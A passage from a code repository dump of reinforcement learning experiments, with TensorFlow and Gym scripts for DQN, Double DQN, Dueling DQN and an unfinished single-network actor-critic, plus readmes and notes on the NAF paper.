ep_reward,'|step:',st)\n break \n \n # choose action with module.\n \n'''########### begining ###########'''\n\nif __name__ == '__main__':\n sess = tf.Session()\n #merged = tf.summary.merge_all() \n env = gym.make(ENV_NAME)\n #env.seed(1)\n print('----source env info----'\n '\\n action space:', env.action_space,\n '\\n state shape:', env.observation_space,\n '\\n reward range:', env.reward_range, # in reality, it ranges [-1, 1]\n '\\n render modes:', env.metadata,\n '\\n Env spec:', env.spec,\n '\\n-----------------------') \n s_dim = env.observation_space\n a_dim = env.action_space.n \n \n process = Preprocess\n# processState = Preprocess.process_state()\n# processReward = Preprocess.process_reward()\n #print('============mark-0==============')\n# sess.run(tf.global_variables_initializer())\n module = DuelingDQN(n_actions=a_dim, n_features=[None,80,80,4], learning_rate=LR, reward_decay=GAMMA, replace_target_iter=REPLACE_TARGET, sess=sess) \n #print('============mark0.5==============')\n writer = tf.summary.FileWriter(LOG_PATH, sess.graph)\n train()\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 60,
"blob_id": "14de8a601aca4ce98bbaff07915ddfc05ff7f868",
"content_id": "dc977c97a381a62c19b4e50e4c4b3141f9a4a898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 1,
"path": "/GymSeries/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "## This folder inculdes the RL code runed in Gym environment\n\n"
},
{
"alpha_fraction": 0.7750611305236816,
"alphanum_fraction": 0.7799510955810547,
"avg_line_length": 57.33333206176758,
"blob_id": "134ef460db44a49130827c6eba0416347e56767c",
"content_id": "14fb5ce2d10c9be6b157a09c1ac3a5de5c5f6f6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 21,
"path": "/Mono_network/NAF.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "# Continuous Deep Q-Learning with Model-based Acceleration (NAF)\n\n> Shixiang Gu, University of Cambridge , 2016\n\n\n\n- Abstract\n\t- The sample complexity of model free algorithm limit their applicability to physical system.\n\t- We derive a continuous variant of the Q-learning algorithm we call NAF. \n\t- Combining NAF with models to accelerate learning.\n- Related work\n\t- Model free algorithms tend to be more generally applicable but substantially slower.\n- Background\n\t- Model-free RL: Policy gradient methods provide a simple, direct approach to RL, which can succeed on high-dimensinal problems, but potentially requires a large number of samples.\n\t- Off-policy algorithms that use value or Q-function approximation can in principle achieve better data efficiency. However it requires optimizing two function approximators on different objectives.\n\t- Advantage = Q - V\n\t- If we know the dynamic p(x1|x0,u), we can use model-based RL and optimal control.\n- NAF\n\t- The idea behind NAF is to represent the Q function in Q-learning in such a way that its maximum, argmaxQ.\n\t- P is a state-dependent, positive-definite square matrix\n\t- \n\n\n"
},
{
"alpha_fraction": 0.6270763874053955,
"alphanum_fraction": 0.6470099687576294,
"avg_line_length": 29.753246307373047,
"blob_id": "e211f1b5830a76a16b87c66a5eb7f9bbb5bc4705",
"content_id": "ed6245f4b26237692a484b21ce16e3e3a702fbaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2642,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 77,
"path": "/Gym_Pendulum_DoubleDQN/run_Pendulum.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDouble DQN & Natural DQN comparison,\nThe Pendulum example.\n\nView more on my tutorial page: https://morvanzhou.github.io/tutorials/\n杆子立起来的时候 reward 为0,其余为负数.\nUsing:\nTensorflow: 1.0\ngym: 0.8.0\n\"\"\"\n\n\nimport gym\nfrom RL_brain import DoubleDQN\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\nenv = gym.make('Pendulum-v0')\nenv = env.unwrapped#不运行这个会有错误\nenv.seed(1)\nMEMORY_SIZE = 3000\nACTION_SPACE = 11 #把这个游戏的连续动作离散化\n\nsess = tf.Session()\nwith tf.variable_scope('Natural_DQN'):#普通的 DQN\n natural_DQN = DoubleDQN(\n n_actions=ACTION_SPACE, n_features=3, memory_size=MEMORY_SIZE,\n e_greedy_increment=0.001, double_q=False, sess=sess\n )\n\nwith tf.variable_scope('Double_DQN'):#double DQN\n double_DQN = DoubleDQN(\n n_actions=ACTION_SPACE, n_features=3, memory_size=MEMORY_SIZE,\n e_greedy_increment=0.001, double_q=True, sess=sess, output_graph=True)\n\nsess.run(tf.global_variables_initializer()) #tf 变量初始化\n\n\ndef train(RL):\n total_steps = 0\n observation = env.reset() #环境初始化\n while True:\n #if total_steps - MEMORY_SIZE > 80: env.render() #启动环境界面\n\n action = RL.choose_action(observation)\n\n f_action = (action-(ACTION_SPACE-1)/2)/((ACTION_SPACE-1)/4) # convert to [-2 ~ 2] float actions 把连续的动作离散化 等距离分割\n observation_, reward, done, info = env.step(np.array([f_action]))\n\n reward /= 10 # normalize to a range of (-1, 0). r = 0 when get upright(normalize 归一化)\n # the Q target at upright state will be 0, because Q_target = r + gamma * Qmax(s', a') = 0 + gamma * 0\n # so when Q at this state is greater than 0, the agent overestimates the Q. Please refer to the final result.\n\n RL.store_transition(observation, action, reward, observation_) #和 DQN 是一样的了.\n\n if total_steps > MEMORY_SIZE: # learning 这是入口 ※\n RL.learn()\n\n if total_steps - MEMORY_SIZE > 20000: # stop game\n break\n\n observation = observation_\n total_steps += 1\n return RL.q #返回 Q 值\n\nq_natural = train(natural_DQN) #从此处运行\nq_double = train(double_DQN)\n\nplt.plot(np.array(q_natural), c='r', label='natural')#所画图为 Q 值图 普通 DQN 图\nplt.plot(np.array(q_double), c='b', label='double')# double DQN 图\nplt.legend(loc='best') #这是设置图例, best 是自动分配位置\nplt.ylabel('Q eval') #纵坐标\nplt.xlabel('training steps')\nplt.grid()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5176410675048828,
"alphanum_fraction": 0.531265914440155,
"avg_line_length": 35.30534362792969,
"blob_id": "7b1638568e0c9c041753aa430dc5c24b9cb89b6d",
"content_id": "128b5b4cf2a3a6818546166044c4acfcd9b66301",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10575,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 262,
"path": "/Mono_network/mono_network.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n我想用一个网络来实现 AC 的功能, 参考了 NAF 那篇文章的思想,但是目前不 work, 需要进一步探究.\nCreated on Tue Apr 17 01:18:35 2018\n理念:单独网络输出 连续动作 a ,其他分流输出 V 和 A 然后构造 Q, 用 Q 升级网络,周而复始.\n@author: menghaw1 \n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport os #可适应不同系统,解决路径定位的作用\nimport shutil #是一种高层次的文件操作工具\n\nimport sys #为了调用上级目录的下级文件夹\nsys.path.append(\"../..\")\nfrom env.car_env import CarEnv\ntf.reset_default_graph() #为了充值 tf 生成的变量信息,否则不能重复运行\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\nMAX_EPISODES = 300 # 最大 episode\nMAX_EP_STEPS = 300 # 最大步数设置\nLR_A = 1e-4 # learning rate for actor\nLR_C = 1e-4 # learning rate for critic\nGAMMA = 0.9 # reward discount\nREPLACE_ITER_A = 800\nREPLACE_ITER_C = 700\nMEMORY_CAPACITY = 2000 #记忆容量 原来是2000\nBATCH_SIZE = 16\nVAR_MIN = 0.1\nRENDER = False #开启窗口\n\nLOAD = False #重新训练,不载入之前训练过的\n\nDISCRETE_ACTION = False\n\nenv = CarEnv(discrete_action=DISCRETE_ACTION)\nSTATE_DIM = env.state_dim #5\nACTION_DIM = env.action_dim #1\nACTION_BOUND = env.action_bound\n\n\nsess = tf.Session()\nwriter = tf.summary.FileWriter('logsApril05/',sess.graph)\n\n\n# all placeholder for tf\nwith tf.name_scope('S'):\n S = tf.placeholder(tf.float32, shape=[None, STATE_DIM], name='s')\nwith tf.name_scope('R'):\n R = tf.placeholder(tf.float32, [None, 1], name='r')\nwith tf.name_scope('S_'):\n S_ = tf.placeholder(tf.float32, shape=[None, STATE_DIM], name='s_')\n\n\nclass Actor(object): # Actor 函数网络\n def __init__(self, sess, action_dim, action_bound, learning_rate, t_replace_iter , a ):\n self.sess = sess\n self.a_dim = action_dim\n self.action_bound = action_bound\n self.lr = learning_rate\n self.t_replace_iter = t_replace_iter\n self.t_replace_counter = 0\n self.a = a\n self.gamma = .995\n\n with tf.variable_scope('Actor'):\n # input s, output a\n self.a_,self.q = self._build_net(S, self.a, scope='eval_net', trainable=True)\n\n # input s_, output a, get a_ for critic\n self.a__,self.q_ = self._build_net(S_, self.a_, scope='target_net', trainable=False)\n\n self.e_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval_net') #就是每次 a 的值\n self.t_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target_net')\n \n \n with tf.variable_scope('target_q'):\n self.target_q = R + self.gamma * self.q_\n with tf.variable_scope('TD_error'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.target_q, self.q))\n with tf.variable_scope('C_train'):\n self.train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n\n def _build_net(self, s, a ,scope, trainable): #创建网络\n with tf.variable_scope(scope):\n init_w = tf.contrib.layers.xavier_initializer()\n init_b = tf.constant_initializer(0.001)\n net = tf.layers.dense(s, 100, activation=tf.nn.relu,\n kernel_initializer=init_w, bias_initializer=init_b, name='l1',\n trainable=trainable)\n net = tf.layers.dense(net, 20, activation=tf.nn.relu,\n kernel_initializer=init_w, bias_initializer=init_b, name='l2',\n trainable=trainable)\n with tf.variable_scope('l3_a'):\n actions = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, kernel_initializer=init_w,\n name='a', trainable=trainable)\n \n \n scaled_a = tf.multiply(actions, self.action_bound, name='scaled_a') # Scale output to -action_bound to action_bound\n \n # tf.summary.histogram('actions',actions)\n# tf.summary.histogram('scaled_a',scaled_a)\n with tf.variable_scope('l3_V'):\n w3_v = tf.get_variable('w3_v', [20, 1], initializer=init_w) #❓\n b3_v = tf.get_variable('b3_v', [1, 1], initializer=init_b)\n V = tf.matmul(net, w3_v) + b3_v\n \n with tf.variable_scope('l3_A'):\n w3_a = tf.get_variable('w3_a', [20, 20], initializer=init_w)\n b3_a = tf.get_variable('b3_a', [1, 20], initializer=init_b)\n A = tf.matmul(net, w3_a) + b3_a\n \n with tf.variable_scope('q'):\n q = V + (A - tf.reduce_mean(A, axis=1, keep_dims=True)) # Q(s,a)#求平均值. reduce 是归约的意思 ,塌缩一个维度. , keep dims 就是保持维度.\n \n return scaled_a,q\n\n def learn(self, s ,a,r,s_): # batch update\n self.sess.run(self.train_op, feed_dict={S: s,self.a:a, R:r, S_:s_})\n if self.t_replace_counter % self.t_replace_iter == 0:\n self.sess.run([tf.assign(t, e) for t, e in zip(self.t_params, self.e_params)])\n print('Actor params changed')\n self.t_replace_counter += 1\n\n def choose_action(self, s, a):# 细看这一段如何选择动作,是否为连续动作\n s = s[np.newaxis, :] # single state\n return self.sess.run(self.a_, feed_dict={S: s, self.a:a})[0] # single action\n\n# def add_grad_to_graph(self, a_grads):\n# \n## tf.summary.histogram('a_grads',a_grads)# 看是不是每次都不一样 运行了,每次都不一样,\n# \n# with tf.variable_scope('policy_grads'):\n# self.policy_grads = tf.gradients(ys=self.a, xs=self.e_params, grad_ys=a_grads)# dy/dx\n#\n# with tf.variable_scope('A_train'):\n# opt = tf.train.RMSPropOptimizer(-self.lr) # (- learning rate) for ascent policy\n# self.train_op = opt.apply_gradients(zip(self.policy_grads, self.e_params)) #每次更改的是后者里面的所有参数.\n\n\n\n\nclass Memory(object): #存储记忆 s,a,r,s_\n def __init__(self, capacity, dims):\n self.capacity = capacity\n self.data = np.zeros((capacity, dims))\n self.pointer = 0\n\n def store_transition(self, s, a, r, s_):\n transition = np.hstack((s, a, [r], s_))\n index = self.pointer % self.capacity # replace the old memory with new memory\n self.data[index, :] = transition\n self.pointer += 1\n\n def sample(self, n): #从记忆中采样 n 个\n assert self.pointer >= self.capacity, 'Memory has not been fulfilled'\n indices = np.random.choice(self.capacity, size=n)\n return self.data[indices, :]\n\n\n\n# Create actor and critic.\nactor = Actor(sess, ACTION_DIM, ACTION_BOUND[1], LR_A, REPLACE_ITER_A, a= [0.2])\n#critic = Critic(sess, STATE_DIM, ACTION_DIM, LR_C, GAMMA, REPLACE_ITER_C, actor.a, actor.a_)\n#actor.add_grad_to_graph(critic.a_grads) # ❓ 这句能保证每次都传入参数么?\n\nM = Memory(MEMORY_CAPACITY, dims=2 * STATE_DIM + ACTION_DIM + 1)\n\nsaver = tf.train.Saver()\npath = './discrete' if DISCRETE_ACTION else './continuous'\n\nif LOAD:\n saver.restore(sess, tf.train.latest_checkpoint(path))\nelse:\n sess.run(tf.global_variables_initializer())\n \n \nmerged = tf.summary.merge_all()\n\n'''----------------从此处开始运行----------------'''\ndef train(): #训练网络的主函数\n var = 2. # control exploration 探索性设置 方差为2\n for ep in range(MAX_EPISODES):\n s = env.reset()\n ep_step = 0\n all_step = 0 # 这的 定义有问题,应该放到循环外部 ❓\n \n\n for t in range(MAX_EP_STEPS): #步数\n # while True:\n if RENDER:\n env.render()\n\n # Added exploration noise\n if t == 0 :\n a = [0.2]\n else:\n a = actor.choose_action(s,a) #根据 s 选择 a \n \n a = np.clip(np.random.normal(a, var), *ACTION_BOUND) # add randomness to action selection for exploration #为动作添加探索性\n s_, r, done = env.step(a)\n M.store_transition(s, a, r, s_)\n\n if M.pointer > MEMORY_CAPACITY: #记忆空间\n var = max([var*.9995, VAR_MIN]) # decay the action randomness\n b_M = M.sample(BATCH_SIZE)\n b_s = b_M[:, :STATE_DIM]\n b_a = b_M[:, STATE_DIM: STATE_DIM + ACTION_DIM]\n b_r = b_M[:, -STATE_DIM - 1: -STATE_DIM]\n b_s_ = b_M[:, -STATE_DIM:]\n\n# critic.learn(b_s, b_a, b_r, b_s_) #critic 网络开始学习\n actor.learn(b_s, b_a, b_r, b_s_) #\n \n \n# if all_step % 50 == 0:\n# result = sess.run(merged,feed_dict={S:b_s,R:b_r,S_:b_s_,critic.a:b_a})\n# writer.add_summary(result,all_step)\n \n\n s = s_ #状态更新\n ep_step += 1 #一个 episode中 step 增加一\n all_step += 1\n\n if done or t == MAX_EP_STEPS - 1: #每个 episode 所展示的数据\n # if done:\n \n result1=tf.Summary(value=[tf.Summary.Value(tag='ep_step',simple_value=ep_step)])\n writer.add_summary(result1,ep) \n\n print('Ep:', ep,\n '| Steps: %i' % int(ep_step),\n '| Explore: %.2f' % var,\n )\n break\n #保存 model\n if os.path.isdir(path): shutil.rmtree(path)\n os.mkdir(path) #创建文件夹\n ckpt_path = os.path.join(path, 'DDPG.ckpt')\n save_path = saver.save(sess, ckpt_path, write_meta_graph=False)\n print(\"\\nSave Model %s\\n\" % save_path)\n\n\ndef eval(): #载入曾经的网络\n env.set_fps(30)\n while True:\n s = env.reset()\n while True:\n env.render()\n a = actor.choose_action(s)\n s_, r, done = env.step(a)\n s = s_\n if done:\n break\n\nif __name__ == '__main__':\n if LOAD:\n eval()\n else:\n train()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.8066298365592957,
"alphanum_fraction": 0.8093922734260559,
"avg_line_length": 59,
"blob_id": "a8356fad5ee31f53e125cd627c62e22a6e126489",
"content_id": "44ea87e4dd2e457e194ea238f66c422250eb327e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 6,
"path": "/GSS_DQN/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "> This work formulates the graph signal sampling problem as a Deep Q learning process in discrete action space. We compare the reconstruction results with other two methods, uniform random sampling and random walk sampling. \n\n\nThe result is shown below\n\n\n\n\n"
},
{
"alpha_fraction": 0.5133976340293884,
"alphanum_fraction": 0.5916398763656616,
"avg_line_length": 34.730770111083984,
"blob_id": "2fd542ccc828bafbaf8215222ec28c58cc82bfd0",
"content_id": "ec2438d536bba3370bd802bb3f0b970899d834a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 26,
"path": "/Gym_Enduro/preprocess.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 29 17:41:21 2018\n\n@author: menghaw1\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\n\nclass Preprocess(): # return array this step. not tensor\n def process_state(img): # input shape = (210, 160, 3), dtype: unit8\n grayscale = np.mean(img, axis=2) # shape = (210, 160), calculate mean value along the 2nd dimension\n downsample = grayscale[::2, ::2] # shape = (105, 80), sampling step = 2\n square = downsample[0:80,:] # size (80,80)\n \n state = np.reshape(square,(1,80,80)).astype(np.float32) # shape (1,80,80)\n \n observation = np.stack((state, state, state, state), axis = -1) # shape (1,80,80,4)\n #square = tf.convert_to_tensor(square)\n #square = tf.reshape(square, [-1, 80, 80, 1])\n \n return observation\n \n def process_reward(reward):\n return np.clip(reward, -1., 1.)\n "
},
{
"alpha_fraction": 0.7903153896331787,
"alphanum_fraction": 0.7960906028747559,
"avg_line_length": 63.31428527832031,
"blob_id": "eb89dea5170d0dbe2f05231184e679b879e357ec",
"content_id": "0665db7a4f27b8cd22f0bdf9d7c222472264e49a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2251,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 35,
"path": "/README.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "# Reinforcement Learning\n> This repository includes principal RL algorithms and my RL projects.\n## Gym-series environments \n\n * [Gym_CartPole_v0_DDPG](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Cartpole/DDPG_CartPole_v0.py)\n * [Gym_Enduro](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Enduro/DRL_enduro.py)\n * [Gym_Box2d](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Box2d/carRacing.py)\n * [Gym_MountainCar](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_MountainCar/MountainCar-V0-QL.py)\n * [Gym_Pendulum_DoubleDQN](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Pendulum_DoubleDQN/run_Pendulum.py)\n\n## Distance evaluation\n\n * [Reading distance from snapshots](https://github.com/MorganWoods/ReinforcementLearning/tree/master/DistancePrediction)\n\n\n## Mono-network (NAF)\n> This is an idea, not work yet. Using only one network output actions with Q values, like NAF paper did.\n * [mono_network](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Mono_network/mono_network.py)\n * [NAF theory](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Mono_network/NAF.md)\n\n\n## Target tracking with RL\n> The idea based on the paper: Action-Decision Networks for Visual Tracking with Deep Reinforcement Learning Electronics and Telecommunications Research Institute ( ETRI ), South Korea; </br> My solution is applying the rl in continuous action area to re design this experiment\n * [target tracking paper](http://openaccess.thecvf.com/content_cvpr_2017/papers/Yun_Action-Decision_Networks_for_CVPR_2017_paper.pdf)\n\n## Graph signal sampling with RL\n> Apply the DQN to do graph sampling walk\n * [Graph signal sampling via DQN](https://github.com/MorganWoods/ReinforcementLearning/tree/master/GSS_DQN)\n\n\n## Searching for optimal solution\n> This task is working on finding right solution of a complex function. Using the advantage of reinforcement learning, agent is used to find out the solution under complicated and tedious environment instead of human.\n\n## Multi-dimensional continuous control via hierarchical reinforcement learning frame\n> Apply hierarchical frame in multi-actions contorlling task.\n"
},
{
"alpha_fraction": 0.551793098449707,
"alphanum_fraction": 0.5645517110824585,
"avg_line_length": 44.18238830566406,
"blob_id": "4c1cdf9be2e78d21ee7713e8140b9f104b9d7ab8",
"content_id": "d363af9412c62255356513e546f4be4ef599583d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15000,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 318,
"path": "/Gym_MountainCar/brain.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 25 21:42:39 2018\nAll 算法的核心部分整合在这个文件中\n@author: menghaw1\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n# deep Q network off policy\nclass DeepQNetwork:\n def __init__(\n self,\n n_actions,\n n_features,\n learning_rate=0.01,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=300,\n memory_size=500,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=False,\n ):\n self.n_actions=n_actions\n self.n_features=n_features\n self.lr=learning_rate\n self.gamma=reward_decay\n self.epsilon_max=e_greedy\n self.replace_target_iter=replace_target_iter\n self.memory_size=memory_size\n self.batch_size=batch_size\n self.epsilon_increment = e_greedy_increment\n self.epsilon=0 if e_greedy_increment is not None else self.epsilon_max\n \n self.learn_step_counter=0 # total learning step\n # initialize zero memory [s, a, r, s_] 此时状态,下一刻状态 加上 r 和 a\n self.memory = np.zeros((self.memory_size, n_features*2+2)) \n \n self._build_net()\n t_params = tf.get_collection('target_net_params') #Returns a list of values in the collection with the given name\n e_params = tf.get_collection('eval_net_params')\n \n self.replace_target_op = [tf.assign(t,e) for t, e in zip(t_params,e_params)] #不清楚什么意思❓更换目标函数权重参数\n self.sess = tf.Session()\n \n if output_graph:\n tf.summary.FileWriter(\"logs/\",self.sess.graph)\n \n self.sess.run(tf.global_variables_initializer())\n self.cost_his=[]\n #self.reward_his=[]#wu\n def _build_net(self):\n # --------------------------------build evaluate_net--------------------------------------\n self.s = tf.placeholder(tf.float32,[None,self.n_features],name='s') #input\n self.q_target = tf.placeholder(tf.float32,[None,self.n_actions],name='Q_target') #for calculating loss\n with tf.variable_scope('eval_net'):##第一层的神经元数量10\n c_names,n_l1,w_initializer,b_initializer = \\\n ['eval_net_params',tf.GraphKeys.GLOBAL_VARIABLES],\\\n 10,\\\n tf.random_normal_initializer(0.,0.3),\\\n tf.constant_initializer(0.1) #config of layers \n \n #1st layer.\n with tf.variable_scope('l1'):\n w1=tf.get_variable('w1',[self.n_features,n_l1],initializer=w_initializer,collections=c_names)\n b1=tf.get_variable('b1',[1,n_l1],initializer=b_initializer,collections=c_names)\n l1=tf.nn.relu(tf.matmul(self.s,w1)+b1)\n \n #2nd layer.\n with tf.variable_scope('l2'):\n w2=tf.get_variable('w2',[n_l1,self.n_actions],initializer=w_initializer,collections=c_names)\n b2=tf.get_variable('b2',[1,self.n_actions],initializer=b_initializer,collections=c_names)\n self.q_eval=tf.matmul(l1,w2)+b2 #只有一层中间网络,第二层直接是输出层\n \n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target,self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n \n #--------------------------------build target_net--------------------------------\n self.s_ = tf.placeholder(tf.float32,[None,self.n_features],name='s_')\n \n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n \n with tf.variable_scope('l1'):\n w1=tf.get_variable('w1',[self.n_features,n_l1],initializer=w_initializer,collections=c_names)\n b1=tf.get_variable('b1',[1,n_l1],initializer=b_initializer,collections=c_names)\n l1=tf.nn.relu(tf.matmul(self.s_,w1)+b1)\n with tf.variable_scope('l2'):\n w2=tf.get_variable('w2',[n_l1,self.n_actions],initializer=w_initializer,collections=c_names)\n b2=tf.get_variable('b2',[1,self.n_actions],initializer=b_initializer,collections=c_names)\n self.q_next=tf.matmul(l1,w2)+b2 \n \n def store_transition(self,s,a,r,s_):\n if not hasattr(self,'memory_counter'): #判断前者对象的后者属性是否存在,若存在返回 True\n self.memory_counter = 0\n \n transition = np.hstack((s,[a,r],s_)) #horizontal stack 水平合并数组.对应的是 vstack\n #replace the old memory with new memory\n index = self.memory_counter % self.memory_size\n self.memory[index,:] = transition\n self.memory_counter += 1\n \n def choose_action(self,observation):\n observation = observation[np.newaxis,:]\n if np.random.uniform()<self.epsilon:\n actions_value=self.sess.run(self.q_eval,feed_dict={self.s:observation})\n action = np.argmax(actions_value)\n else:\n action = np.random.randint(0,self.n_actions)\n return action\n \n def learn(self):\n #check to repalce target parameters. 每隔多久更换一次目标权重\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n #ghcs = self.learn_step_counter // self.replace_target_iter #向下取整, wu 加 更换次数; 也可以用 round 函数四舍五入\n #print(ghcs,' times target_params_replaced \\n')\n # sample batch memory from all memory\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size,size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter,size=self.batch_size)\n batch_memory = self.memory[sample_index,:]\n \n q_next,q_eval = self.sess.run([self.q_next,self.q_eval], #❓ 不懂这个一步骤的函数\n feed_dict={ \n self.s_:batch_memory[:,-self.n_features:], #fixed params\n self.s :batch_memory[:,:self.n_features], #newest params\n })\n # change q_target w.r.t q_eval's action\n q_target = q_eval.copy()\n \n batch_index=np.arange(self.batch_size,dtype=np.int32)\n eval_act_index=batch_memory[:,self.n_features].astype(int)\n reward = batch_memory[:,self.n_features+1]\n \n q_target[batch_index,eval_act_index]= reward + self.gamma * np.max(q_next,axis=1) #q_target\n \n # train eval network\n _,self.cost = self.sess.run([self._train_op,self.loss],\n feed_dict={self.s:batch_memory[:,:self.n_features],\n self.q_target: q_target})\n \n self.cost_his.append(self.cost)\n #self.reward_his.append(reward)\n \n #increasing epsilon\n self.epsilon=self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1 \n \n def plot_cost(self): \n fig_cost=plt.figure('fig_cost')\n plt.plot(np.arange(len(self.cost_his)),self.cost_his) \n plt.ylabel('cost')\n plt.xlabel('training steps')\n plt.show(fig_cost) \n''' 有问题 \n def plot_reward(self): \n plt.plot(np.arange(len(self.reward_his)),self.reward_his)\n plt.ylabel('reward')\n plt.xlabel('training steps')\n plt.show\n''' \n\n'''---------------------------------------------------------------------'''\nclass DoubleDQN:\n def __init__(\n self,\n n_actions,\n n_features,\n learning_rate=0.005,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=3000,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=False,\n double_q=True,# double DQN\n sess=None,\n ):\n self.n_actions = n_actions\n self.n_features = n_features\n self.lr = learning_rate\n self.gamma = reward_decay\n self.epsilon_max = e_greedy\n self.replace_target_iter = replace_target_iter\n self.memory_size = memory_size\n self.batch_size = batch_size\n self.epsilon_increment = e_greedy_increment\n self.epsilon = 0 if e_greedy_increment is not None else self.epsilon_max\n\n self.double_q = double_q # decide to use double q or not\n\n self.learn_step_counter = 0\n self.memory = np.zeros((self.memory_size, n_features*2+2))\n self._build_net()\n t_params = tf.get_collection('target_net_params')\n e_params = tf.get_collection('eval_net_params')\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]\n\n if sess is None:\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n else:\n self.sess = sess\n if output_graph:\n tf.summary.FileWriter(\"logs/\", self.sess.graph) #输出 board\n self.cost_his = []\n\n def _build_net(self):\n def build_layers(s, c_names, n_l1, w_initializer, b_initializer):\n with tf.variable_scope('l1'):\n w1 = tf.get_variable('w1', [self.n_features, n_l1], initializer=w_initializer, collections=c_names)\n b1 = tf.get_variable('b1', [1, n_l1], initializer=b_initializer, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(s, w1) + b1)\n\n with tf.variable_scope('l2'):\n w2 = tf.get_variable('w2', [n_l1, self.n_actions], initializer=w_initializer, collections=c_names)\n b2 = tf.get_variable('b2', [1, self.n_actions], initializer=b_initializer, collections=c_names)\n out = tf.matmul(l1, w2) + b2\n return out\n # ------------------ build evaluate_net ------------------\n self.s = tf.placeholder(tf.float32, [None, self.n_features], name='s') # input\n self.q_target = tf.placeholder(tf.float32, [None, self.n_actions], name='Q_target') # for calculating loss\n\n with tf.variable_scope('eval_net'):\n c_names, n_l1, w_initializer, b_initializer = \\\n ['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES], 20, \\\n tf.random_normal_initializer(0., 0.3), tf.constant_initializer(0.1) # config of layers\n\n self.q_eval = build_layers(self.s, c_names, n_l1, w_initializer, b_initializer)\n\n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target, self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n\n # ------------------ build target_net ------------------\n self.s_ = 